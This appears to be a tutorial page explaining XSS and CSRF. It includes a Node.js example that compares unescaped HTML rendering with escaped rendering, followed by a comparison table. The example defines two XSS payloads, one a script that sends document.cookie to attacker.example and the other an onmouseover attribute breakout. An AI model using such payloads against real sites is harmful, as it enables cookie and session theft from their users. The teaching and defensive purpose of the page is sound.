1. XSS:
XSS (Cross-Site Scripting) is a web application vulnerability that lets an attacker inject client-side script into pages viewed by other users. The victim's browser executes the script (almost always JavaScript) because it is delivered by a site the victim trusts. There are several ways to get the script in, for example a URL parameter that the page reflects back, or stored content such as a comment or profile field. The attacker needs no authenticated session of their own; the bug is exploitable whenever the site inserts untrusted input into a page without validating it or escaping it for the HTML context it lands in.
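As an added example (not code from the original page), the following Node.js snippet renders a greeting page from a user-supplied `name` value, first by concatenating it straight into the markup and then with context-appropriate escaping. The page layout, the `escapeHtml` helper, the `containsExecutableScript` stand-in for a browser, and the two payloads are all assumptions made for this illustration; the second payload shows that escaping only `<` and `>` would not be enough, because a quote breaks out of an attribute.

```javascript
// Added example, not from the original page: reflected XSS in a page that echoes
// a user-controlled name, beside the escaped version.  The layout, helper names
// and payloads below are assumptions made for this illustration.

// Vulnerable: the value is concatenated straight into HTML in two contexts,
// element text and a double-quoted attribute value.
function renderUnsafe(name) {
  return `<h1>Welcome, ${name}!</h1>` +
         `<input type="text" value="${name}">`;
}

// Minimal HTML escaper covering element text and quoted attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Hardened: same page, every untrusted value escaped before insertion.
function renderSafe(name) {
  const n = escapeHtml(name);
  return `<h1>Welcome, ${n}!</h1>` +
         `<input type="text" value="${n}">`;
}

// Crude stand-in for a browser: does the markup now contain a script element,
// or a tag carrying a quoted inline event handler that the input created?
function containsExecutableScript(html) {
  return /<script\b/i.test(html) ||
         /<[a-z][^>]*\son\w+\s*=\s*["']/i.test(html);
}

// Constructed payloads: one for the element-text context, one that closes the
// value="..." attribute and adds an event handler.
const PAYLOAD_SCRIPT =
  '<script>document.location="https://attacker.example/?c="+document.cookie</script>';
const PAYLOAD_ATTR = '" onmouseover="alert(document.cookie)';

function demo() {
  return {
    unsafeScript: containsExecutableScript(renderUnsafe(PAYLOAD_SCRIPT)), // true
    unsafeAttr:   containsExecutableScript(renderUnsafe(PAYLOAD_ATTR)),   // true
    safeScript:   containsExecutableScript(renderSafe(PAYLOAD_SCRIPT)),   // false
    safeAttr:     containsExecutableScript(renderSafe(PAYLOAD_ATTR)),     // false
  };
}

console.log(demo());
```

Escaping must match the context: the entity table above is correct for element text and quoted attributes, but a value inserted into a `<script>` block, a URL, or CSS needs a different encoder, and an unquoted attribute value is not protected by it at all.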
2. CSRF:
Cross-Site Request Forgery is one of the most serious web vulnerabilities; depending on the application it can be used for anything from silently changing a user's details to taking over the account. The attacker abuses the victim's existing context, above all the session cookie, to trick the victim's browser into sending a request the victim never intended to make. Because the server identifies the user by the cookie that accompanies every request, it treats the forged request as a legitimate action by that user.
Differences between XSS and CSRF:
S.No. | XSS | CSRF |
---|---|---|
1. | XSS stands for Cross-Site Scripting. | CSRF stands for Cross-Site Request Forgery. |
2. | The attacker injects a malicious client-side script into a page of the vulnerable site; the script then runs in the browser of every victim who views that page. | The attacker crafts a page or link that makes the victim's browser send requests to the target site; the victim does not know the request was made. |
3. | Root cause: untrusted data is inserted into a page without validation or output encoding. | Root cause: the server accepts a state-changing request on the strength of the session cookie alone, which the browser attaches to cross-site requests automatically. |
4. | Relies on script (normally JavaScript) executing in the victim's browser. | Needs no JavaScript; an auto-submitting HTML form or an `<img>` tag pointing at the vulnerable URL is enough. |
5. | The vulnerable site itself serves the malicious code to the victim. | The malicious code is hosted on a third-party site (or sent by e-mail); the vulnerable site only receives the resulting request. |
6. | A site vulnerable to XSS is effectively also vulnerable to CSRF: injected script runs in the site's own origin, so it can read anti-CSRF tokens and issue authenticated requests from inside the page. | A site completely protected against XSS can still be vulnerable to CSRF if its state-changing requests are not tied to something a cross-site page cannot supply (a per-session token, a SameSite cookie, an Origin check). |
7. | Generally the more severe of the two. | Generally the less severe of the two. |
8. | The attacker's script runs as the victim inside the application, so it can do anything the victim's browser can do there, including reading responses. | The attacker can only trigger the specific state-changing actions the vulnerable endpoints perform, and cannot read the responses. |